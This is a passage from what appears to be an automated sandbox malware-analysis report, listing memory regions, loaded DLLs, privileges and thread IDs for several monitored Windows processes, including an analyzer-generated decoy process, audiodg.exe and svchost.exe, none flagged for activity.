- |
| pagefile_0x0000000000d10000 | 0x00d10000 | 0x00d14fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000d20000 | 0x00d20000 | 0x00d23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d50000 | 0x00d50000 | 0x00e4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000e50000 | 0x00e50000 | 0x00fd7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000fe0000 | 0x00fe0000 | 0x01160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000011a0000 | 0x011a0000 | 0x011affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011b0000 | 0x011b0000 | 0x025affff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000025b0000 | 0x025b0000 | 0x025effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025f0000 | 0x025f0000 | 0x026effff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ede0000 | 0x7ede0000 | 0x7eedffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eee0000 | 0x7eee0000 | 0x7ef02fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef03000 | 0x7ef03000 | 0x7ef03fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef04000 | 0x7ef04000 | 0x7ef04fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef07000 | 0x7ef07000 | 0x7ef09fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef0d000 | 0x7ef0d000 | 0x7ef0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #103: publisherfunnydownloaded.exe
0
0
| Information | Value |
|---|---|
| ID | #103 |
| File Name | c:\program files\windows portable devices\publisherfunnydownloaded.exe |
| Command Line | "C:\Program Files\Windows Portable Devices\publisherfunnydownloaded.exe" |
| Initial Working Directory | C:\Program Files\Windows Portable Devices\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
| Remark | This is a randomly generated process started by the VMRay Analyzer prior to the sample analysis. |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x450 |
| Parent PID | 0x508 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C44
0x
654
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000100000 | 0x00100000 | 0x0010ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00113fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00143fff | Pagefile Backed Memory | r |
|
|
|
- |
| publisherfunnydownloaded.exe | 0x00150000 | 0x00166fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002e0000 | 0x0039dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00403fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000410000 | 0x00410000 | 0x00414fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x00423fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x00940fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x0098ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x0099ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001da0000 | 0x01da0000 | 0x01e57fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01faffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x74c00000 | 0x74c1cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74c20000 | 0x74c94fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74ca0000 | 0x74d30fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ef80000 | 0x7ef80000 | 0x7f07ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f080000 | 0x7f080000 | 0x7f0a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0a3000 | 0x7f0a3000 | 0x7f0a5fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0a9000 | 0x7f0a9000 | 0x7f0abfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0ac000 | 0x7f0ac000 | 0x7f0acfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f0ad000 | 0x7f0ad000 | 0x7f0adfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #104: audiodg.exe
0
0
| Information | Value |
|---|---|
| ID | #104 |
| File Name | c:\windows\system32\audiodg.exe |
| Command Line | C:\Windows\system32\AUDIODG.EXE 0x7f8 |
| Initial Working Directory | C:\Windows |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd0c |
| Parent PID | 0x338 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D38
0x
D34
0x
D30
0x
D24
0x
D20
0x
D1C
0x
D18
0x
D10
0x
DC8
0x
788
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000001fe7bc0000 | 0x1fe7bc0000 | 0x1fe7bc6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001fe7bd0000 | 0x1fe7bd0000 | 0x1fe7bdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000001fe7be0000 | 0x1fe7be0000 | 0x1fe7bf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001fe7c00000 | 0x1fe7c00000 | 0x1fe7c7ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x1fe7c80000 | 0x1fe7d3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000001fe7d40000 | 0x1fe7d40000 | 0x1fe7e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe7ec0000 | 0x1fe7ec0000 | 0x1fe7ec6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe7ed0000 | 0x1fe7ed0000 | 0x1fe7ed1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe7ee0000 | 0x1fe7ee0000 | 0x1fe7f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001fe7f60000 | 0x1fe7f60000 | 0x1fe801ffff | Pagefile Backed Memory | r |
|
|
|
- |
| audiodg.exe.mui | 0x1fe8020000 | 0x1fe8020fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000001fe8030000 | 0x1fe8030000 | 0x1fe8030fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8040000 | 0x1fe8040000 | 0x1fe8040fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001fe8050000 | 0x1fe8050000 | 0x1fe8050fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001fe8060000 | 0x1fe8060000 | 0x1fe8060fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001fe8080000 | 0x1fe8080000 | 0x1fe808ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8090000 | 0x1fe8090000 | 0x1fe8291fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000001fe82a0000 | 0x1fe82a0000 | 0x1fe8427fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000001fe8430000 | 0x1fe8430000 | 0x1fe85b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000001fe85c0000 | 0x1fe85c0000 | 0x1fe863ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x1fe8640000 | 0x1fe8976fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000001fe8980000 | 0x1fe8980000 | 0x1fe89fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8a00000 | 0x1fe8a00000 | 0x1fe8a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8ad0000 | 0x1fe8ad0000 | 0x1fe8ad1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8ae0000 | 0x1fe8ae0000 | 0x1fe8ce1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8cf0000 | 0x1fe8cf0000 | 0x1fe8cf0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8d00000 | 0x1fe8d00000 | 0x1fe8d00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8d10000 | 0x1fe8d10000 | 0x1fe8d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8d90000 | 0x1fe8d90000 | 0x1fe8e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8e10000 | 0x1fe8e10000 | 0x1fe8e8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8f30000 | 0x1fe8f30000 | 0x1fe8f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8f40000 | 0x1fe8f40000 | 0x1fe8f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8f50000 | 0x1fe8f50000 | 0x1fe8f51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8f60000 | 0x1fe8f60000 | 0x1fe8f71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000001fe8fc0000 | 0x1fe8fc0000 | 0x1fe90bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff170000 | 0x7df5ff170000 | 0x7ff5ff16ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff67d04a000 | 0x7ff67d04a000 | 0x7ff67d04bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67d04c000 | 0x7ff67d04c000 | 0x7ff67d04dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67d04e000 | 0x7ff67d04e000 | 0x7ff67d04ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff67d050000 | 0x7ff67d050000 | 0x7ff67d14ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff67d150000 | 0x7ff67d150000 | 0x7ff67d172fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff67d173000 | 0x7ff67d173000 | 0x7ff67d173fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67d174000 | 0x7ff67d174000 | 0x7ff67d175fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67d176000 | 0x7ff67d176000 | 0x7ff67d177fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67d178000 | 0x7ff67d178000 | 0x7ff67d179fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67d17a000 | 0x7ff67d17a000 | 0x7ff67d17bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67d17e000 | 0x7ff67d17e000 | 0x7ff67d17ffff | Private Memory | rw |
|
|
|
- |
| audiodg.exe | 0x7ff67dcf0000 | 0x7ff67dd4ffff | Memory Mapped File | rwx |
|
|
|
- |
| audiokse.dll | 0x7ff8d7470000 | 0x7ff8d74d7fff | Memory Mapped File | rwx |
|
|
|
- |
| wmalfxgfxdsp.dll | 0x7ff8d74e0000 | 0x7ff8d769afff | Memory Mapped File | rwx |
|
|
|
- |
| audioses.dll | 0x7ff8d98e0000 | 0x7ff8d9964fff | Memory Mapped File | rwx |
|
|
|
- |
| audioeng.dll | 0x7ff8db340000 | 0x7ff8db3bdfff | Memory Mapped File | rwx |
|
|
|
- |
| rtworkq.dll | 0x7ff8e6440000 | 0x7ff8e646ffff | Memory Mapped File | rwx |
|
|
|
- |
| mfplat.dll | 0x7ff8e6470000 | 0x7ff8e657bfff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ff8e7430000 | 0x7ff8e7560fff | Memory Mapped File | rwx |
|
|
|
- |
| avrt.dll | 0x7ff8e75b0000 | 0x7ff8e75bafff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ff8e79b0000 | 0x7ff8e7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ff8e7b40000 | 0x7ff8e7bb1fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ff8ec300000 | 0x7ff8ec440fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #105: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #105 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k UnistackSvcGroup |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfc8 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E40
0x
DFC
0x
E24
0x
D54
0x
374
0x
FD0
0x
FCC
0x
4D4
0x
C9C
0x
E98
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000baab140000 | 0xbaab140000 | 0xbaab14ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0xbaab150000 | 0xbaab150fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000baab160000 | 0xbaab160000 | 0xbaab173fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000baab180000 | 0xbaab180000 | 0xbaab1fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000baab200000 | 0xbaab200000 | 0xbaab203fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000baab210000 | 0xbaab210000 | 0xbaab210fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000baab220000 | 0xbaab220000 | 0xbaab221fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xbaab230000 | 0xbaab2edfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000baab2f0000 | 0xbaab2f0000 | 0xbaab36ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000baab2f0000 | 0xbaab2f0000 | 0xbaab2f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000baab370000 | 0xbaab370000 | 0xbaab370fff | Private Memory | rw |
|
|
|
- |
| private_0x000000baab380000 | 0xbaab380000 | 0xbaab380fff | Private Memory | rw |
|
|
|
- |
| phoneutilres.dll | 0xbaab390000 | 0xbaab390fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000baab3a0000 | 0xbaab3a0000 | 0xbaab3a0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000baab3b0000 | 0xbaab3b0000 | 0xbaab3b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000baab3c0000 | 0xbaab3c0000 | 0xbaab3c6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000baab3d0000 | 0xbaab3d0000 | 0xbaab3d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| syncres.dll | 0xbaab3e0000 | 0xbaab3e0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000baab3f0000 | 0xbaab3f0000 | 0xbaab3f6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000baab400000 | 0xbaab400000 | 0xbaab4fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000baab500000 | 0xbaab500000 | 0xbaab5fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000baab600000 | 0xbaab600000 | 0xbaab787fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000baab790000 | 0xbaab790000 | 0xbaab910fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000baab920000 | 0xbaab920000 | 0xbaacd1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000baacd20000 | 0xbaacd20000 | 0xbaace1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000baace20000 | 0xbaace20000 | 0xbaacf1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000baacf20000 | 0xbaacf20000 | 0xbaad01ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000baad020000 | 0xbaad020000 | 0xbaad09ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000baad020000 | 0xbaad020000 | 0xbaad11ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000baad0a0000 | 0xbaad0a0000 | 0xbaad11ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000baad120000 | 0xbaad120000 | 0xbaad21ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xbaad220000 | 0xbaad556fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000baad560000 | 0xbaad560000 | 0xbaad589fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffca0000 | 0x7df5ffca0000 | 0x7ff5ffc9ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff672f5c000 | 0x7ff672f5c000 | 0x7ff672f5dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672f5e000 | 0x7ff672f5e000 | 0x7ff672f5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff672f60000 | 0x7ff672f60000 | 0x7ff67305ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff673060000 | 0x7ff673060000 | 0x7ff673082fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff673084000 | 0x7ff673084000 | 0x7ff673085fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673086000 | 0x7ff673086000 | 0x7ff673087fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff673088000 | 0x7ff673088000 | 0x7ff673089fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67308a000 | 0x7ff67308a000 | 0x7ff67308afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67308c000 | 0x7ff67308c000 | 0x7ff67308dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff67308e000 | 0x7ff67308e000 | 0x7ff67308ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff673b40000 | 0x7ff673b4cfff | Memory Mapped File | rwx |
|
|
|
- |
| cemapi.dll | 0x7ff8d4e90000 | 0x7ff8d4ecffff | Memory Mapped File | rwx |
|
|
|
- |
| accountaccessor.dll | 0x7ff8d4ed0000 | 0x7ff8d4f05fff | Memory Mapped File | rwx |
|
|
|
- |
| userdatatimeutil.dll | 0x7ff8d4f10000 | 0x7ff8d4f30fff | Memory Mapped File | rwx |
|
|
|
- |
| synccontroller.dll | 0x7ff8d4ff0000 | 0x7ff8d505bfff | Memory Mapped File | rwx |
|
|
|
- |
| userdatalanguageutil.dll | 0x7ff8d5240000 | 0x7ff8d5250fff | Memory Mapped File | rwx |
|
|
|
- |
| aphostservice.dll | 0x7ff8d5260000 | 0x7ff8d52adfff | Memory Mapped File | rwx |
|
|
|
- |
| phoneutil.dll | 0x7ff8d55b0000 | 0x7ff8d55f0fff | Memory Mapped File | rwx |
|
|
|
- |
| pimstore.dll | 0x7ff8d5600000 | 0x7ff8d5770fff | Memory Mapped File | rwx |
|
|
|
- |
| syncutil.dll | 0x7ff8d5780000 | 0x7ff8d57c6fff | Memory Mapped File | rwx |
|
|
|
- |
| userdataplatformhelperutil.dll | 0x7ff8d57d0000 | 0x7ff8d57e5fff | Memory Mapped File | rwx |
|
|
|
- |
| networkhelper.dll | 0x7ff8d57f0000 | 0x7ff8d5806fff | Memory Mapped File | rwx |
|
|
|
- |
| inproclogger.dll | 0x7ff8db8b0000 | 0x7ff8db8bcfff | Memory Mapped File | rwx |
|
|
|
- |
| vaultcli.dll | 0x7ff8dcd60000 | 0x7ff8dcda7fff | Memory Mapped File | rwx |
|
|
|
- |
| tokenbroker.dll | 0x7ff8deca0000 | 0x7ff8ded65fff | Memory Mapped File | rwx |
|
|
|
- |
| mccspal.dll | 0x7ff8df180000 | 0x7ff8df18afff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ff8df640000 | 0x7ff8dfaa9fff | Memory Mapped File | rwx |
|
|
|
- |
